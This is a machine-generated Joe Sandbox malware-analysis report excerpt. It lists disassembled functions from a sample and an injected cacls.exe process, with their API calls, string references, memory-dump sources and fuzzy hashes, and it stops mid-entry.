Function 010BB4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 010F728C

Strings

RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 010F7294
RTL: Resource at %p, xrefs: 010F72A3
RTL: Re-Waiting, xrefs: 010F72C1

Memory Dump Source

Source File: 00000003.00000002.1882900814.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1050000_zAg7xx1vKI.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 885266447-605551621
Opcode ID: 225126f494d391e02521fdfbff1176ce8bfee734009b8b854aa6451e67513aab
Instruction ID: 6b34566efaf609cbc033f023429df6feb55d21bcc59cf065ac6474823284b63f
Opcode Fuzzy Hash: 225126f494d391e02521fdfbff1176ce8bfee734009b8b854aa6451e67513aab
Instruction Fuzzy Hash: 6841F035600203ABD765DE29CC82FAAB7E5FB54710F10461DFAD5AB680DB21E8028BD2

Function 01132300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 0113238D
___swprintf_l.LIBCMT ref: 011323B3

Strings

%%%u, xrefs: 01132384
]:%u, xrefs: 011323AA

Memory Dump Source

Source File: 00000003.00000002.1882900814.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1050000_zAg7xx1vKI.jbxd

Similarity

API ID: ___swprintf_l
String ID: %%%u$]:%u
API String ID: 48624451-3050659472
Opcode ID: 87b97d05edc11ab839f573fbf39cf5299759e8886aa2242a2180092def4dd03c
Instruction ID: 03f516b2222179af8eb517738fe2e067a1fecaee5464c3e6a0241b6a24e91b48
Opcode Fuzzy Hash: 87b97d05edc11ab839f573fbf39cf5299759e8886aa2242a2180092def4dd03c
Instruction Fuzzy Hash: 13318672A002199FDB24DF2DCC40BEE77F8EB44610F44455AE949E3204EB30AA448FA0

Function 010C7D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 010C7E8B

Strings

+, xrefs: 010C7DE8
-, xrefs: 010C7DDD

Memory Dump Source

Source File: 00000003.00000002.1882900814.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1050000_zAg7xx1vKI.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-
API String ID: 1302938615-2137968064
Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
Instruction ID: 9eac759cf03cbab8174b35a091a4dda483e5895753ba152793a1bf840550f1b3
Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
Instruction Fuzzy Hash: 62919071E0021A9BEB64DF6DC8816BEBBF5BF44B20F24855EE995E72C0D73099428F11

Function 01089126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON

Download Yara Rule

Strings

$, xrefs: 01089191
@, xrefs: 01089175

Memory Dump Source

Source File: 00000003.00000002.1882900814.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1050000_zAg7xx1vKI.jbxd

Similarity

API ID:
String ID: $$@
API String ID: 0-1194432280
Opcode ID: 102bd670b72ce75debb7bb90ec0b55459026eadf33aefb69c74784d0b5d9779e
Instruction ID: 081af244bdf6d8a74a0b9bab43b3cf8218a517e85957d7b716512119dbf3156f
Opcode Fuzzy Hash: 102bd670b72ce75debb7bb90ec0b55459026eadf33aefb69c74784d0b5d9779e
Instruction Fuzzy Hash: CA812A72D042699FDB35DB54CC44BEEBBB8AB48754F0041EAEA59B7240D7309E84CFA0

Function 0110CEA0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 134COMMON

Download Yara Rule

APIs

@_EH4_CallFilterFunc@8.LIBCMT ref: 0110CFBD

Strings

@, xrefs: 0110CF0A
@4rw@4rw, xrefs: 0110CFD5, 0110CFDA, 0110CFF1

Memory Dump Source

Source File: 00000003.00000002.1882900814.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1050000_zAg7xx1vKI.jbxd

Similarity

API ID: CallFilterFunc@8
String ID: @$@4rw@4rw
API String ID: 4062629308-2979693914
Opcode ID: c1bdda9f9d406adda4f4736fabc68d365181e547836b7b3fe15f08e3e9616943
Instruction ID: 46fa8f8b3c68b02d64a169b8c36c2d10f5b2c89f26e703414efa5930f218ae2d
Opcode Fuzzy Hash: c1bdda9f9d406adda4f4736fabc68d365181e547836b7b3fe15f08e3e9616943
Instruction Fuzzy Hash: 18418C71D00619DFDB2ADFE9D840AAEBBB8FF54B40F00412AE955DB398D7708841DB62

Analysis Process: cacls.exePID: 7312, Parent PID: 6332COMMON

Execution Graph

Execution Coverage:	2.5%
Dynamic/Decrypted Code Coverage:	4.1%
Signature Coverage:	2.2%
Total number of Nodes:	458
Total number of Limit Nodes:	77

Executed Functions

Function 00629E50 Relevance: 26.6, Strings: 21, Instructions: 395
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

z), xrefs: 0062A558
8n, xrefs: 0062A094
"n, xrefs: 0062A075
PY, xrefs: 0062A316
x`, xrefs: 0062A039
=G, xrefs: 0062A08D
Yu, xrefs: 0062A04D
,, xrefs: 00629F0A
p, xrefs: 0062A09B
)t, xrefs: 0062A0A2
@, xrefs: 00629EF6
jJ, xrefs: 0062A000
Pq, xrefs: 00629F88
~, xrefs: 00629FEC
m@, xrefs: 0062A530
/a, xrefs: 00629FF6
q, xrefs: 0062A014
B`, xrefs: 00629FBC
us, xrefs: 0062A061
z`, xrefs: 00629FD1
Z4, xrefs: 00629F45

Memory Dump Source

Source File: 00000006.00000002.2553471608.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_cacls.jbxd

Yara matches

Similarity

API ID:
String ID: "n$)t$,$/a$8n$=G$@$B`$PY$Pq$Yu$Z4$jJ$m@$p$us$x`$z)$z`$q$~
API String ID: 0-299318214
Opcode ID: 634340827704f3cf04db53abc9752875e21da0b7cd32c5bef7890ecd0a219a94
Instruction ID: 6c695af65c9d07e3bcd95ce1cf51d564cd2d6bf7ebb9fee5ce425eb23cd461dd
Opcode Fuzzy Hash: 634340827704f3cf04db53abc9752875e21da0b7cd32c5bef7890ecd0a219a94
Instruction Fuzzy Hash: 0522F3B0D05629CFEB24CF84D894BDDBBB2BB44308F1081D9C549AB380DBB55A89DF65

Function 0063C940 Relevance: 4.6, APIs: 3, Instructions: 106fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNELBASE(?,00000000), ref: 0063CA24
FindNextFileW.KERNELBASE(?,00000010), ref: 0063CA5F
FindClose.KERNELBASE(?), ref: 0063CA6A

Memory Dump Source

Source File: 00000006.00000002.2553471608.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_cacls.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNext
String ID:
API String ID: 3541575487-0
Opcode ID: 9d27a8dcd305fc1bab0a29c7ea9d517702547bd46d60a9d6759da10dfb66ff6c
Instruction ID: 870a463e415d864e5aa99678cc3d7c15666b615910f9d275ca752dfd6598e124
Opcode Fuzzy Hash: 9d27a8dcd305fc1bab0a29c7ea9d517702547bd46d60a9d6759da10dfb66ff6c
Instruction Fuzzy Hash: 56315D71A00708ABDB60DFA4CC86FEF777D9F45B54F14449CB909AA181DB70AB848BA4

Function 00649560 Relevance: 1.6, APIs: 1, Instructions: 101filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(?,?,?,C3714B7A,?,?,?,?,?,?,?), ref: 00649661

Memory Dump Source

Source File: 00000006.00000002.2553471608.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_cacls.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: e3c55a6a012d0c960e2372c45c7d93e030ed8fa0c9b77380962c01b5fbf43196
Instruction ID: 706bd9fa43402cc1baf121143cb97e7c419cb64aab0b6cb96e54f49e3a5a0aae
Opcode Fuzzy Hash: e3c55a6a012d0c960e2372c45c7d93e030ed8fa0c9b77380962c01b5fbf43196
Instruction Fuzzy Hash: 4E31C2B5A01248AFDB54DF98D881EEFB7F9AF8C304F108219F909A7340D770A951CBA5

Function 006496D0 Relevance: 1.6, APIs: 1, Instructions: 93filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(?,?,?,C3714B7A,?,?,?,?,?), ref: 006497B9

Memory Dump Source

Source File: 00000006.00000002.2553471608.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_cacls.jbxd

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: d26101aeaaa043df99420354c37e34887d72040b686b126e709cff6c41da8d29
Instruction ID: 5f069620820a9f60638c8b28579577d21dc90097266007b8764bc312c0b363fa
Opcode Fuzzy Hash: d26101aeaaa043df99420354c37e34887d72040b686b126e709cff6c41da8d29
Instruction Fuzzy Hash: 4031E3B5A00608AFDB14DF98D881EEFB7F9EF88314F108219F919A7240D770A9518FA5

Function 006499D0 Relevance: 1.6, APIs: 1, Instructions: 81memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(0063209E,?,0064834F,C3714B7A,00000004,00003000,?,?,?,?,?,0064834F,0063209E,0064B901,0064834F,520F8B51), ref: 00649A98

Memory Dump Source

Source File: 00000006.00000002.2553471608.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_cacls.jbxd

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: ce89629044f2441d048d03dcdc22383d650bc2c2de4880009a5b8edf100d122a
Instruction ID: e96ee7164868e92b15811d2f58407adaabe257268d7f77149212d6c36ac5078c
Opcode Fuzzy Hash: ce89629044f2441d048d03dcdc22383d650bc2c2de4880009a5b8edf100d122a
Instruction Fuzzy Hash: 14212BB5A00608AFDB10DF98DC41EEF77B9EF89710F108109FD19AB240D770A951CBA5

Function 006497D0 Relevance: 1.6, APIs: 1, Instructions: 61filenativeCOMMON

Download Yara Rule

APIs

NtDeleteFile.NTDLL(?), ref: 00649866

Memory Dump Source

Source File: 00000006.00000002.2553471608.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_cacls.jbxd

Yara matches

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 954619f73f159c906b658b08830aa2f3d9ebf4970ffdbfa5db3952952fb91dc1
Instruction ID: 0aa2e73e879e2d93a7239ac1570ab3ba971a4ddf693af54104281bffd5f80abf
Opcode Fuzzy Hash: 954619f73f159c906b658b08830aa2f3d9ebf4970ffdbfa5db3952952fb91dc1
Instruction Fuzzy Hash: B6118C716006087BD720EAA8DC42FEBB7ADDF85714F10810DFA09AA281E7717A558BE5

Function 00649870 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(?,00633443,001F0001,?,00000000,?,?,00000104), ref: 006498A4

Memory Dump Source

Source File: 00000006.00000002.2553471608.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_cacls.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 1ccfb7074c235d79d87762803b7bffdee7b431a73409e616f994fa16c9a62f17
Instruction ID: 1ee30acd2b2901d91629b5e247fd5bda919d7a0f4438db57dc8d62e24f6c23d8
Opcode Fuzzy Hash: 1ccfb7074c235d79d87762803b7bffdee7b431a73409e616f994fa16c9a62f17
Instruction Fuzzy Hash: EFE04F352106147BD220BA59DC01FDB779DEBC5750F004419FA086B141C6707A4187E5

Function 02F84340 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 02F8434A

Memory Dump Source

Source File: 00000006.00000002.2557235760.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true

Associated: 00000006.00000002.2557235760.0000000003039000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2557235760.000000000303D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2557235760.00000000030AE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2f10000_cacls.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 53ef36f3eef23330da26bcb5b0e85a288824c55a6c56b44fec0dabef4b27a982
Instruction ID: 56bcd7924ae982e8643ff4ec87cb32f6f0c70b3d2ae8a4dc90e08c1565d0de90
Opcode Fuzzy Hash: 53ef36f3eef23330da26bcb5b0e85a288824c55a6c56b44fec0dabef4b27a982
Instruction Fuzzy Hash: 5290023160580022A54071588884547400597E1381B55C011E1428554C8A148A565365

Function 02F84650 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 02F8465A

Memory Dump Source

Source File: 00000006.00000002.2557235760.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true

Associated: 00000006.00000002.2557235760.0000000003039000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2557235760.000000000303D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2557235760.00000000030AE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2f10000_cacls.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: c196f4e2247d69f1e5541cd04e0d608c842158411edee68835537d3400a77d4e
Instruction ID: 62a95abb00f65d9cfdcfa30bcaa7427fa2b76cb5a1b5b910a9ce6853176f6e22
Opcode Fuzzy Hash: c196f4e2247d69f1e5541cd04e0d608c842158411edee68835537d3400a77d4e
Instruction Fuzzy Hash: 1590027160150052554071588804407600597E2381395C115A1558560C86188955926D

Function 02F82AF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 02F82AFA

Memory Dump Source

Source File: 00000006.00000002.2557235760.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true

Associated: 00000006.00000002.2557235760.0000000003039000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2557235760.000000000303D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2557235760.00000000030AE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2f10000_cacls.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a2236f30c62c5c342c3e190f95b8ba1c2ba3bc47b04383808c86aa9e7c46237c
Instruction ID: 8fa30d3635d2e60158ec2115d03f3b5beea6ccb789a12e0fe90220b6b805938f
Opcode Fuzzy Hash: a2236f30c62c5c342c3e190f95b8ba1c2ba3bc47b04383808c86aa9e7c46237c
Instruction Fuzzy Hash: C7900235221400121545B558460450B044597D73D1395C015F241A590CC62189655325

Function 02F82AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 02F82ADA

Memory Dump Source

Source File: 00000006.00000002.2557235760.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true

Associated: 00000006.00000002.2557235760.0000000003039000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2557235760.000000000303D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2557235760.00000000030AE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2f10000_cacls.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f6c28a91dad61b3496426aa5c80f94db943b773760cf8f8764e7ba4936dafbc2
Instruction ID: a52c38fa43081937a0200087410daa295c704cb91e1ef2e3b412bafc2bbf7931
Opcode Fuzzy Hash: f6c28a91dad61b3496426aa5c80f94db943b773760cf8f8764e7ba4936dafbc2
Instruction Fuzzy Hash: 07900435311400131505F55C47045070047C7D73D1355C031F301D550CD731CD715135

Function 02F82BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 02F82BFA

Memory Dump Source

Source File: 00000006.00000002.2557235760.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true

Associated: 00000006.00000002.2557235760.0000000003039000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2557235760.000000000303D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2557235760.00000000030AE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2f10000_cacls.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3272636d959325f9f644511e413168e55cf5b8fbce7ad751a1c8f8e41d275b2d
Instruction ID: 44898e1f1adc202484a15d93ccd9e719a474300d2c11ceb8e44aff20f52da5a0
Opcode Fuzzy Hash: 3272636d959325f9f644511e413168e55cf5b8fbce7ad751a1c8f8e41d275b2d
Instruction Fuzzy Hash: BA90023120140812E5807158840464B000587D2381F95C015A1029654DCA158B5977A5

Function 02F82BE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 02F82BEA

Memory Dump Source

Source File: 00000006.00000002.2557235760.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true

Associated: 00000006.00000002.2557235760.0000000003039000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2557235760.000000000303D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2557235760.00000000030AE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2f10000_cacls.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e3587482c24d8072b20d80e130ae3943af7d081cadd1697eab0d98ab269859a5
Instruction ID: 3acc94356edba329241543727fd7807293d8817e47576bc405cee0f625dd1ba8
Opcode Fuzzy Hash: e3587482c24d8072b20d80e130ae3943af7d081cadd1697eab0d98ab269859a5
Instruction Fuzzy Hash: CB90023120544852E54071588404A47001587D1385F55C011A1068694D96258E55B665

Function 02F82BA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 02F82BAA

Memory Dump Source

Source File: 00000006.00000002.2557235760.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true

Associated: 00000006.00000002.2557235760.0000000003039000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2557235760.000000000303D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2557235760.00000000030AE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2f10000_cacls.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b2ccfcd7a7c002884b7274bcf1d59cdf8e7cf9cedc3eba99d5fdec23d62a3f46
Instruction ID: 06f7ae588054adb8dc9eb65a2a055222f3e3653085498755a8849242c36a9c9a
Opcode Fuzzy Hash: b2ccfcd7a7c002884b7274bcf1d59cdf8e7cf9cedc3eba99d5fdec23d62a3f46
Instruction Fuzzy Hash: A190023160540812E55071588414747000587D1381F55C011A1028654D87558B5576A5

Function 02F82B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 02F82B6A

Memory Dump Source

Source File: 00000006.00000002.2557235760.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true

Associated: 00000006.00000002.2557235760.0000000003039000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2557235760.000000000303D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2557235760.00000000030AE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2f10000_cacls.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 643a7a2927d1050dee63ab14f5f85b2e1730f92671de4b89fbd41481c4eeae11
Instruction ID: f86c6fab4291730f5d929ca763b5e0dd8e48add195239c54d7b82c93fd11edde
Opcode Fuzzy Hash: 643a7a2927d1050dee63ab14f5f85b2e1730f92671de4b89fbd41481c4eeae11
Instruction Fuzzy Hash: 5D90027120240013550571588414617400A87E1281B55C021E2018590DC52589916129

Function 02F82EE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 02F82EEA

Memory Dump Source

Source File: 00000006.00000002.2557235760.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true

Associated: 00000006.00000002.2557235760.0000000003039000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2557235760.000000000303D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2557235760.00000000030AE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2f10000_cacls.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 366c6cad31ea51e14b442339d9d9e8319f863bf7a66d54d77bbfe1aae5363718
Instruction ID: 0aa2f765e263a0110eabd6b1849606e817ca1085594a3fb9688024f81f60a784
Opcode Fuzzy Hash: 366c6cad31ea51e14b442339d9d9e8319f863bf7a66d54d77bbfe1aae5363718
Instruction Fuzzy Hash: DA90027120180413E54075588804607000587D1382F55C011A3068555E8A298D516139

Function 02F82E80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 02F82E8A

Memory Dump Source

Source File: 00000006.00000002.2557235760.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true

Associated: 00000006.00000002.2557235760.0000000003039000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2557235760.000000000303D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2557235760.00000000030AE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2f10000_cacls.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d954f708b15abeea2ae550dae63e1b366ec2333930dc2ed401c363d1ab3a2559
Instruction ID: f59d9e6d79a762adbab8e45ef420e026d9dc419045417d339923195a681e3d1a
Opcode Fuzzy Hash: d954f708b15abeea2ae550dae63e1b366ec2333930dc2ed401c363d1ab3a2559
Instruction Fuzzy Hash: C290023160140512E50171588404617000A87D12C1F95C022A2028555ECA258A92A135

Function 02F82FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 02F82FEA

Memory Dump Source

Source File: 00000006.00000002.2557235760.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true

Associated: 00000006.00000002.2557235760.0000000003039000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2557235760.000000000303D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2557235760.00000000030AE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2f10000_cacls.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f48d624b08e57685211ea6cd6246e89bb46abfc15c24dbf7a0b7b599a3a8a2fe
Instruction ID: 69dfb6445e2308ff69676f1b133ee80b118551ae81692f59810ec92939851762
Opcode Fuzzy Hash: f48d624b08e57685211ea6cd6246e89bb46abfc15c24dbf7a0b7b599a3a8a2fe
Instruction Fuzzy Hash: 78900231211C0052E60075688C14B07000587D1383F55C115A1158554CC91589615525

Function 02F82FB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 02F82FBA

Memory Dump Source

Source File: 00000006.00000002.2557235760.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true

Associated: 00000006.00000002.2557235760.0000000003039000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2557235760.000000000303D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2557235760.00000000030AE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2f10000_cacls.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9791aa0262c8795fe9a5d37e3c6d3beca9c0818b528f250e56b68cc1dd22c813
Instruction ID: 41a13684b65a71b9aace033068af485bccaeaec70ffd3854921ffcc6908ab60c
Opcode Fuzzy Hash: 9791aa0262c8795fe9a5d37e3c6d3beca9c0818b528f250e56b68cc1dd22c813
Instruction Fuzzy Hash: 019002316014005255407168C8449074005ABE2291755C121A199C550D855989655669

Function 02F82F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 02F82F3A

Memory Dump Source

Source File: 00000006.00000002.2557235760.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true

Associated: 00000006.00000002.2557235760.0000000003039000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2557235760.000000000303D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2557235760.00000000030AE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2f10000_cacls.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 2186f2dce08e26e0f9a0444911015d8d2463294a4040136e474761f031b376f3
Instruction ID: 9657f942fd320a1779c8d27c4b73f5771c4e579612ec69a4189f2694d649075f
Opcode Fuzzy Hash: 2186f2dce08e26e0f9a0444911015d8d2463294a4040136e474761f031b376f3
Instruction Fuzzy Hash: 4590027134140452E50071588414B070005C7E2381F55C015E2068554D8619CD52612A

Function 02F82CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 02F82CAA

Memory Dump Source

Source File: 00000006.00000002.2557235760.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true

Associated: 00000006.00000002.2557235760.0000000003039000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2557235760.000000000303D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2557235760.00000000030AE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2f10000_cacls.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d6497c1d9251fc69c2ec74d89e4723cca48d12c186b14a860d3702f3812336e9
Instruction ID: 0aa73acc21ce200ff7247b0f0a8898ef661d371a9ca9ab0f3684a3597e5f7064
Opcode Fuzzy Hash: d6497c1d9251fc69c2ec74d89e4723cca48d12c186b14a860d3702f3812336e9
Instruction Fuzzy Hash: 7690023120140412E50075989408647000587E1381F55D011A6028555EC66589916135

Function 02F82C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 02F82C7A

Memory Dump Source

